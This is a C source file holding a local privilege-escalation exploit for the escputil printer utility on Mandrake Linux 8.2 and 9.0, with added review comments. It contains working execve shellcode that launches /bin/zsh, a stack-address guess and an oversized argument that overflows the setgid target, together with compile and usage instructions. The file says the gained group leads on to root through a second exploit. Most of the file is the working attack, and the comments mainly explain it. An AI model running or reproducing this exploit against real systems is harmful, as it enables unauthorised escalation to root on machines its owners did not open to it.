/*

Linux Mandrake 8.2, 9.0 / x86 local exploit for escputil
Mandrake 8.2 provides escputil without sgid bit set, so
exploiting doesn't change egid value, in Mandrake 9.0
escputil has sgid bit set and after successfully exploiting
attacker gains egid=3(sys). It allows to gain root privileges
through ml85p exploit. Exploit executes /bin/zsh, check if
it exists before exploiting.

Karol Więsek [appelast-at-bsquad.sm.pl]

compile:	gcc -o escputil escputil_ex.c
usage:		./escputil [offset]

*/

#include <unistd.h>
#include <stdio.h>

#define VULN_PROG "/usr/bin/escputil"
#define NOP 0x41

/* 
    We don't have to setgid(3) when we don't execute bash
    and moreover we can't setgid(3)
*/

/*
 * Payload bytes placed into the overflowing buffer by main().
 * Read from the per-instruction comments below: "/bin/zsh" is built on the
 * stack (pushed as "/zsh" then "/bin", preceded by a zero dword from the
 * xorl/pushl pair that terminates it), %ebx gets its address, argv
 * { pathname, NULL } is built and its address put in %ecx, cdq copies the
 * still-zero %eax into %edx, and int $0x80 with %al = 0x0b is the Linux/x86
 * execve system call. The byte sequence must stay exact: editing any
 * escape changes what the target ends up executing.
 */
char shellcode[]=
    "\x31\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\x68""/zsh"           /* pushl   $imm32 "/zsh"          */
    "\x68""/bin"           /* pushl   $imm32 "/bin"          */
    "\x89\xe3"             /* movl    %esp,%ebx              */
    "\x50"                 /* pushl   %eax                   */
    "\x53"                 /* pushl   %ebx                   */
    "\x89\xe1"             /* movl    %esp,%ecx              */
    "\x99"                 /* cdql                           */
    "\xb0\x0b"             /* movb    $0x0b,%al              */
    "\xcd\x80"             /* int     $0x80                  */
;

/*
 * Returns the current stack pointer; main() adds an offset to it to guess
 * where the payload will sit in the target process.
 * NOTE(review): there is no return statement. The value only comes out
 * because the inline asm leaves %esp in %eax and the x86 calling convention
 * returns integers in %eax. Falling off the end of a non-void function and
 * using the result is undefined behavior, and the asm has no outputs or
 * volatile qualifier, so the result depends on compiler and optimization
 * level.
 */
long get_sp(void)
    {
    __asm("movl %esp, %eax");
    }

/*
 * Builds the oversized -P argument and replaces this process with the
 * target program.
 * argv[1] (optional): offset added to the stack pointer returned by get_sp();
 * defaults to 500 when absent.
 * Returns 0 only when execl() fails (a successful execl never returns); the
 * failure is not reported.
 */
int main(int argc, char *argv[])
{
    char bufor[1051];      /* filler, 4-byte address slot at [1046], NUL at [1050] */
    int addr,offset;       /* NOTE(review): addr is int but printed with %08lx below */

    fprintf(stderr,"\nLocal exploit for printer maintenance utility for EPSON Stylus printers\n");
    fprintf(stderr,"Bug found and exploit writen by appelast [appelast-at-bsquad.sm.pl]\n");
    fprintf(stderr,"\nUsage : %s [offset]\n", argv[0]);
    sleep(2);
    /* memset/memcpy/strlen/atoi are called with only <unistd.h> and <stdio.h>
       included, so they are implicitly declared; C99 and later reject this. */
    memset(bufor,NOP,sizeof(bufor));
    if (argc>1)
	{ 
	offset=atoi(argv[1]);  /* no validation: non-numeric input silently yields 0 */
	} else {
	offset = 500;
	}
    addr=get_sp() + offset;        /* guessed location of the payload in the target */
    fprintf(stderr,"Address : 0x%08lx\n",addr); /* %lx with an int argument: format mismatch */
    *(int *)(bufor+1046)=addr;     /* type-punned, possibly unaligned store (x86 tolerates it) */
    /* Payload is laid down so it ends at [1045], one byte before the address
       slot; everything before it is the 0x41 filler from memset. */
    memcpy(bufor+1050-4-strlen(shellcode)-1,shellcode,strlen(shellcode));
    bufor[1050]=0;                 /* terminate so execl passes a C string */
    fprintf(stderr,"Exploiting...\n");
    /* The buffer goes in as the value of -P. The target presumably copies that
       argument into a fixed-size stack buffer without a length check (not
       visible here); the defect class is an unbounded argv copy, and the fix on
       the target side is a bounded copy or an explicit length check. */
    execl(VULN_PROG,VULN_PROG,"-P",bufor,"-c",NULL);
    return 0;                      /* reached only if execl fails; errno is not checked */
}

